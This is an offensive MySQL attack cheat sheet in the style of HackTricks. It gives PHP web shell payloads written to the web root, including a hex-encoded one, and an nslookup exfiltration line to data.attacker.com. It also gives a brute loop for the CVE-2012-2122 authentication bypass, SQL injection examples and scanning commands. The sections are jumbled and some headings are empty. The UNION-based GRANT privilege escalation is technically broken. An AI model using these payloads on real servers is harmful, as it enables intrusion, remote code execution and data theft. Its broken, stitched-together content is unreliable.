
MySQL HackTricks Verified: A Practical Analysis of Attack Vectors and Defensive Validation

2.3 Writing a Web Shell

If you have FILE and know the web root, you can write a webshell (provided secure_file_priv is not set to a restricted directory).

Example:

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

HackTricks Verified Bypass:
If OUTFILE fails due to newline issues, use INTO DUMPFILE with hex:

SELECT unhex('3c3f7068702073797374656d28245f4745545b27636d64275d293b203f3e') INTO DUMPFILE '/var/www/html/shell2.php';

Part 8: The "Verified" Red Flags – When a Technique Fails

Not every HackTricks command works everywhere. Here is the reality check:

| Technique | Failure Reason | Verified Alternative |
| :--- | :--- | :--- |
| INTO OUTFILE | secure_file_priv is set | Use INTO DUMPFILE in plugin dir |
| LOAD_FILE() | File size > max_allowed_packet | Use LOAD DATA LOCAL INFILE |
| UDF Shell | plugin_dir not writable | Try writing to tmp and restarting MySQL (rare) |
| OOB DNS | Linux doesn't support UNC | Use sys_eval('nslookup data.attacker.com') |


6. PrivEscalation

Example:

http://example.com/vulnerable-page?id=1 UNION SELECT GRANT ALL PRIVILEGES ON *.* TO 'username'@'%' IDENTIFIED BY 'password' -- -

8. MySQL Authentication Bypass (CVE-2012-2122)

Affected versions: MySQL 5.0.x – 5.1.63, 5.5.x – 5.5.24, 5.6.x – 5.6.6
Exploit: When memcmp() returns 0, authentication succeeds even with a wrong password.
Exploit script (bash):

for i in `seq 1 1000`; do mysql -u root -pwrong -h target.com -e "select 1" 2>&1; done

Roughly a 1 in 256 chance of success per attempt.


Part 1: Enumeration – The "Verified" Scan

Before exploiting, you must enumerate. Nmap is the standard bearer.

Verified Command:

nmap -sV -sC -p 3306 <target-ip> --script mysql*

What to look for:

Pro Tip: Use Metasploit’s auxiliary scanner for speed.

use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_login

Hardening checklist (actionable)

9. MySQL Command Execution via system (MySQL client only)

If you have MySQL command line client access:

system ls -la
\! whoami

Not a remote vulnerability – only works from an interactive client session.


1. Union-Based SQL Injection

Example:

http://example.com/vulnerable-page?id=1 UNION SELECT NULL,NULL,NULL -- -